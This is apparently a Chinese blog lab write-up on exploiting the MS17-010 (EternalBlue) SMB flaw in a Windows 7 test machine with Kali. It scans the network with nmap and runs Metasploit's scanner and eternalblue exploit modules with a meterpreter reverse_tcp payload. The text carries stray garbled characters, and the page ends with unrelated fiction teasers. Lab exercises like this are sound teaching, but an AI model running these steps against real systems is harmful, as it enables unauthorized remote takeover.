ms17-010實驗

原文鏈接

1. 實驗?zāi)康?/h1>

利用ms17-010漏洞獲得靶機(一個存在漏洞的系統(tǒng))權(quán)限。

2. 實驗原理

利用了微軟 Microsoft Windows SMB 服務(wù)器通信協(xié)議婆廊。

SMB主要用來使得一個網(wǎng)絡(luò)上的機器共享計算機文件蒲祈、打印機功戚、串行端口和通訊等資源。它也提供認(rèn)證的行程間通訊機能。使用445端口景东。

攻擊者利用445端口發(fā)送特殊設(shè)計的消息吞琐,來遠(yuǎn)程執(zhí)行攻擊代碼捆探。

3. 準(zhǔn)備

一臺靶機(win7),一臺攻擊機(kali)

4. 過程

1. 設(shè)置掃描ip

先推算ip站粟,設(shè)置攻擊機和靶機在同一網(wǎng)段黍图。

Kali機設(shè)置(有兩種方法):

① vim /etc/network/interfaces

image
image

更改完后記得重啟網(wǎng)卡。

image

② ip addr add 你的ip地址/24 dev eth0

使用nmap掃描網(wǎng)段內(nèi)存活的主機:

nmap -sP + 網(wǎng)段

image

掃描到兩臺機子奴烙,一臺是我們的攻擊機助被,133是我們的win7靶機。

2. 使用msf攻擊

啟動msf:msfconsole

(ps:會出現(xiàn)的圖像隨機切诀,不影響操作)

img

查找ms17-010模塊:search ms17-010

image

使用use調(diào)用模塊測試:use auxiliary/scanner/smb/smb_ms17_010

image

設(shè)置檢測對象:set rhosts 192.168.1.133(剛才掃描出的靶機ip揩环,這里用133做試驗)

image

查看配置信息:show options

image

可以看到,rhost已經(jīng)設(shè)置成功幅虑。

這時候可以運行了丰滑,使用run或者exploit

img

上面寫著’host is likely vulnerable to ms17-010’翘单,表示這臺靶機可利用ms17-010漏洞攻擊吨枉。

現(xiàn)在調(diào)用攻擊模塊:use exploit/windows/smb/ms17_010_eternalblue

image

后面的操作還是一樣設(shè)置rhost蹦渣。不過這次要設(shè)置lhost(就是你攻擊機的ip地址)和payload

使用show options查看設(shè)置貌亭。

set rhost 192.168.1.133
set lhost 192.168.1.24
set payload windows/x64/meterpreter/reverse_tcp
show options
run
image
image

成功柬唯!

5.參考

http://ourjs.com/detail/59172166f12390061496168f
https://blog.csdn.net/qq_37053007/article/details/88327077
https://blog.csdn.net/qq_36197704/article/details/82458557
https://blog.csdn.net/qq_41880069/article/details/82908293

——————————————————————————————
這里是soya
郵箱:1057851022@qq.com
個人博客地址:https://soyawww.github.io
歡迎各位交流探討哦!

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末圃庭,一起剝皮案震驚了整個濱河市锄奢,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌剧腻,老刑警劉巖拘央,帶你破解...
    沈念sama閱讀 218,546評論 6 507
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異书在,居然都是意外死亡灰伟,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,224評論 3 395
  • 文/潘曉璐 我一進店門儒旬,熙熙樓的掌柜王于貴愁眉苦臉地迎上來栏账,“玉大人,你說我怎么就攤上這事栈源〉簿簦” “怎么了?”我有些...
    開封第一講書人閱讀 164,911評論 0 354
  • 文/不壞的土叔 我叫張陵甚垦,是天一觀的道長茶鹃。 經(jīng)常有香客問我,道長艰亮,這世上最難降的妖魔是什么闭翩? 我笑而不...
    開封第一講書人閱讀 58,737評論 1 294
  • 正文 為了忘掉前任,我火速辦了婚禮垃杖,結(jié)果婚禮上男杈,老公的妹妹穿的比我還像新娘丈屹。我一直安慰自己调俘,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,753評論 6 392
  • 文/花漫 我一把揭開白布旺垒。 她就那樣靜靜地躺著彩库,像睡著了一般。 火紅的嫁衣襯著肌膚如雪先蒋。 梳的紋絲不亂的頭發(fā)上骇钦,一...
    開封第一講書人閱讀 51,598評論 1 305
  • 那天,我揣著相機與錄音竞漾,去河邊找鬼眯搭。 笑死窥翩,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的鳞仙。 我是一名探鬼主播寇蚊,決...
    沈念sama閱讀 40,338評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼棍好!你這毒婦竟也來了仗岸?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,249評論 0 276
  • 序言:老撾萬榮一對情侶失蹤借笙,失蹤者是張志新(化名)和其女友劉穎扒怖,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體业稼,經(jīng)...
    沈念sama閱讀 45,696評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡盗痒,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,888評論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了低散。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片积糯。...
    茶點故事閱讀 40,013評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖谦纱,靈堂內(nèi)的尸體忽然破棺而出看成,到底是詐尸還是另有隱情,我是刑警寧澤跨嘉,帶...
    沈念sama閱讀 35,731評論 5 346
  • 正文 年R本政府宣布川慌,位于F島的核電站,受9級特大地震影響祠乃,放射性物質(zhì)發(fā)生泄漏梦重。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,348評論 3 330
  • 文/蒙蒙 一亮瓷、第九天 我趴在偏房一處隱蔽的房頂上張望琴拧。 院中可真熱鬧,春花似錦嘱支、人聲如沸蚓胸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,929評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽沛膳。三九已至,卻和暖如春汛聚,著一層夾襖步出監(jiān)牢的瞬間锹安,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,048評論 1 270
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留叹哭,地道東北人忍宋。 一個月前我還...
    沈念sama閱讀 48,203評論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像风罩,于是被迫代替她去往敵國和親讶踪。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,960評論 2 355

推薦閱讀更多精彩內(nèi)容